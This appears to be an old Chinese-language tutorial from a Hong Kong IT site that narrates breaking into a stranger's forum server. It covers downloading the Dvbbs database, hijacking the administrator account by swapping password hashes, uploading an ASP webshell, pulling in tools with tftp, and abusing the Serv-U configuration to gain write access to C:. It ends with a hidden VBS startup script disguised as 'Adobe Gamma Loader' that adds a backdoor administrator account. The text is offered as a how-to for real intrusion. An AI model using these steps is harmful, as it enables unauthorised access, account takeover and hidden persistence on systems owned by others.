香港IT網 - asp木馬配合servu取得管理員許可權

今天心情不好，寫一篇文章玩玩吧，利用網站的配置錯誤配合serv－u取得管理員許可權，簡單一點就是通過asp木馬配合serv－u取得管理員許可權，哈哈哈，是不是很cool阿!
－－－－－－－－－－－－文章開始－－－－－－－－－－－－
為了找倉木麻衣的mp3（這個小姑娘的歌很好聽阿），把半個互聯網都搜完了（太誇張了把)，就是找不到，苦然眼鏡一亮，哈哈哈×××論壇，看來人氣不錯，也有mp3的下載地址，那就去看看吧
暈～～～～，
論壇錯誤資訊
產生錯誤的可能原因：
您是否仔細閱讀了幫助檔，可能您還沒有登陸或者不具有使用當前功能的許可權。
還要註冊阿，可是論壇由於種種原因又不讓註冊
氣的我差點吐血！
怎麼辦阿？？？唉本想用溯雪破解幾個密碼。可是我們這個落後的地方上網貴，速度慢，有那個錢早就可以去買幾張d版cd了，算了想想別的辦法把，打開我的xscan，隨便掃了一下，伺服器挺安全阿，只開了21，80，3389埠
看來做了埠過濾
沒什麼可利用的漏洞怎麼辦，不要著急，他用的是動網論壇，先試著下載他的資料庫試試吧
手動的找了一些，都不行
我先猜一下資料庫在哪個目錄裏面，如果猜對的話下載資料庫的成功率就比較高了
http://aaa.com/data
http://aaa.com/database
http://aaa.com/db
HTTP 錯誤 404 - 找不到檔
Internet 資訊服務
繼續
http://aaa.com/mdb
HTTP 錯誤 403 - 禁止訪問
Internet Explorer
把我以前些的添加的資料庫位址檔載入xscan（專門下載資料庫的位址），然後只掃描cgi漏洞
scaning.......，大概10分鐘過去了
掃描結果
/mdb/lovemaik.asa [漏洞描述]
哈哈哈，成功的掃到了資料庫
順便告訴大家一個技巧，把一些常用的資料庫位址如data.mdb,database.asp等等添加到xscan的cgi資料庫中，或者單獨作一個資料庫，你可以用一些字典來生成資料庫位址，這樣的成功率很高的！
打開Net Transport（一種很爽的下載工具）把資料庫down過來，用了50多分鐘，終於下載完了
在自己的機器上安裝jmail和動網論壇，把下載的資料庫覆蓋新資料庫，接著註冊用戶：allen，密碼：123456
調然後把資料庫副檔名改為.mdb ,打開
查看我們剛才註冊的用戶密碼為49ba59abbe56e057(由於論壇使用md5不可逆演算法加密，所以不那得到明文密碼）
好的把這一串資料複製一下，然後找到管理員的名字，也就是查找userclass表中資料為管理員的名字
把他的密碼改成49ba59abbe56e057，記住在改密碼之前一定要把他的密碼（經過MD5加密過的）複製到一個記事本裏
好了，我們用管理員的名字登陸，密碼就是123456，接著我們就去修改用戶資料，把回答問題和答案改掉！把email換成自己的，接著把剛才註冊的用戶allen提升為管理員，退出，在用allen帳號登陸，把原來的管理員降成普通用戶，可能有些會問這樣做是為什麼，原因是動網論壇不允許管理員通過email取回密碼，接著在打開資料庫把原來管理員的密碼給恢復了，在打開論壇，忘記密碼－回答問題－取回密碼，哈哈哈，快打開你的信箱把，密碼已經發到你信箱了（注意，你的系統最好裝jmail等郵件發送元件，要不然就會發不了郵件的）
現在我們拿到了論壇管理員的密碼了，登陸那個論壇－進入管理頁面－論壇版面管理－隨便選一個討論區－在上傳檔類型中加上.asp，呵呵
好了，進去這個討論區發表帖子－上傳檔，呵呵，把asp木馬傳上去
好了，可是這個檔被重命名了，唉，新虧手裏還有一個免fso的木馬，只有一個檔。傳上去
可惜這個木馬不好用，還是自己的木馬用著順手，於是tftp -i ***.***.***.*** GET use.asp
好了，成功了，接這運行木馬www.***.com/bbs/use.asp?id=1
呵呵，伺服器的東西清清楚楚的擺在我們面前了，上傳一個winshell把
靠，伺服器有病毒防火牆，看看是nav的，算了，自己加個殼把
繼續，傳上去並執行。。。。沒反應！
先telnet ip 8210（我喜歡用noika手機的型號做為埠，^_^）
靠，不行，差點忘了，對方做埠過濾了
怎麼辦阿，試試idq.dll（沒報什麼希望），果然對方的目錄不可執行，在看一下對方有沒有裝perl
還是沒有!在看看對方是什麼分區格式，要是fat32那就好辦了，試著刪除c:\的任何檔都提示沒有許可權！唉，麻煩阿！！！
本來想就此打住的時候突然發現了d:\Serv-U，於是我就想通過他來拿到許可權
注：在此之前最好在自己的機器上裝一個Serv-U,
我們先看看ServUStartUpLog.txt
Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat
。。。。。。。。。。
版本挺新阿，呵呵
接著看看ServUDaemon.ini（用戶配置檔）
哇考，裏面的用戶真多阿！
接著我們把這個檔的內容複製一下，然後粘貼到本地serv－u的ServUDaemon.ini檔中，記住這時候最好停掉你的serv－u，保存檔，接著打開ServUAdmin.exe，重新添加一個用戶，記住這個用戶最好是管理員許可權，必須對目錄和檔可以進行讀寫可執行等一切操作，接著把用戶主目錄設為c:\
哈哈哈，到次為止大家都知道我的用意了把！
接這ftp上去
哈哈c盤的東西全部暴露了，現在我們對c盤有讀寫許可權，可以進行任何操作（注意：serv－u的管理員許可權和nt的管理員許可權不是一樣的，serv－u的管理員只能配置serv－u）
由於對方做了埠過濾，辦法不是很多，可以參考一篇修改註冊表根改埠過濾的文章，是灰色軌跡論壇的一個網友寫的，哈哈，在這裏就不多說了！
我們先寫一個vbs腳本，把這個腳本重命名為Adobe Gamma Loader，這樣管理員不容易發現！
腳本內容：
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user allen ***** /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0)
大家都能看懂把，哈哈
然後把他傳到Documents and Settings\All Users\「開始」功能表\程式\啟動\
責任編輯: 風隨行


會員控制臺會員登入會員註冊最後更新進階搜尋會員投稿登出


IT首頁 \| 作業系統 \| 軟體教學 \| 硬體頻道 \| 網絡頻道 \| 防黑技術 \| 網頁設計 \| 程式設計 \| 圖形圖像 \| 數碼&遊戲 \| 加解密技術 \| IT論壇	當前線上：34 人